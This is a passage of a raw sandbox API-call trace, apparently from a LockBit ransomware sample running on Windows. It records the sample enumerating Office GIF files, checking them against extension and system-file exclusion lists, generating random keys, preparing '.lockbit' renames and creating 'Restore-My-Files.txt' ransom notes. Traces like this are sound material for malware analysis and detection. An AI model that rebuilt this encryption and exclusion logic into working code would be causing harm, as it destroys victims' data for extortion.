lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14514_.GIF") returned 1 [0203.153] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14514_.GIF") returned 1 [0203.153] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14514_.GIF") returned -1 [0203.153] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14514_.GIF") returned 1 [0203.153] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14514_.GIF") returned 1 [0203.153] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.153] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14514_.GIF") returned=".GIF" [0203.153] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.153] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.153] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.154] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.154] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14514_.GIF.lockbit") returned 78 [0203.154] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14514_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14514_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.155] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.155] malloc (_Size=0x40068) returned 0x3df0008 [0203.155] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=179) returned 1 [0203.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.156] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.159] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14514_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14514_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.159] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.159] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.159] free (_Block=0x1fa2ed8) [0203.159] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14514_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.159] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.160] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.160] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb91d2700, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc8dfee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb91d2700, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14515_.GIF", cAlternateFileName="")) returned 1 [0203.160] lstrcmpiW (lpString1=".", lpString2="BD14515_.GIF") returned -1 [0203.160] lstrcmpiW (lpString1="..", lpString2="BD14515_.GIF") returned -1 [0203.160] PathFindExtensionW (pszPath="BD14515_.GIF") returned=".GIF" [0203.160] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.160] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.160] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.161] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.161] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14515_.GIF") returned 1 [0203.161] lstrcmpiW (lpString1="ntldr", lpString2="BD14515_.GIF") returned 1 [0203.161] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14515_.GIF") returned 1 [0203.161] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14515_.GIF") returned 1 [0203.161] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14515_.GIF") returned -1 [0203.161] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14515_.GIF") returned 1 [0203.161] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14515_.GIF") returned 1 [0203.161] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.161] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14515_.GIF") returned=".GIF" [0203.161] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.161] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.161] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.161] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.161] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.161] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.161] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.161] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.162] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.162] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.162] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.162] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.162] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.162] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.162] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.162] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.162] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14515_.GIF.lockbit") returned 78 [0203.162] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14515_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14515_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.164] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.164] malloc (_Size=0x40068) returned 0x3df0008 [0203.164] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=179) returned 1 [0203.164] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.164] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.165] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.165] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.165] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.168] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14515_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14515_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.168] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.168] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.168] free (_Block=0x1fa2ed8) [0203.168] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14515_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.168] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.168] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.168] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd05b1500, ftCreationTime.dwHighDateTime=0x1bd8f8e, ftLastAccessTime.dwLowDateTime=0xbc8dfee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd05b1500, ftLastWriteTime.dwHighDateTime=0x1bd8f8e, nFileSizeHigh=0x0, nFileSizeLow=0x111, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14528_.GIF", cAlternateFileName="")) returned 1 [0203.169] lstrcmpiW (lpString1=".", lpString2="BD14528_.GIF") returned -1 [0203.169] lstrcmpiW (lpString1="..", lpString2="BD14528_.GIF") returned -1 [0203.169] PathFindExtensionW (pszPath="BD14528_.GIF") returned=".GIF" [0203.169] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.169] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.169] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.170] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14528_.GIF") returned 1 [0203.170] lstrcmpiW (lpString1="ntldr", lpString2="BD14528_.GIF") returned 1 [0203.170] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14528_.GIF") returned 1 [0203.170] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14528_.GIF") returned 1 [0203.170] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14528_.GIF") returned -1 [0203.170] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14528_.GIF") returned 1 [0203.170] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14528_.GIF") returned 1 [0203.170] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.170] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14528_.GIF") returned=".GIF" [0203.170] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.170] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.170] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.170] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.170] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.170] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.170] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.170] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.170] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.170] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.170] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.171] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.171] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.171] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.171] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.171] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.171] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14528_.GIF.lockbit") returned 78 [0203.171] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14528_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14528_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.172] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.172] malloc (_Size=0x40068) returned 0x3df0008 [0203.172] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=273) returned 1 [0203.173] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.173] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.173] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.173] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.173] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.176] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14528_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14528_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.176] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.176] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.176] free (_Block=0x1fa2ed8) [0203.176] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14528_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.176] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.176] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 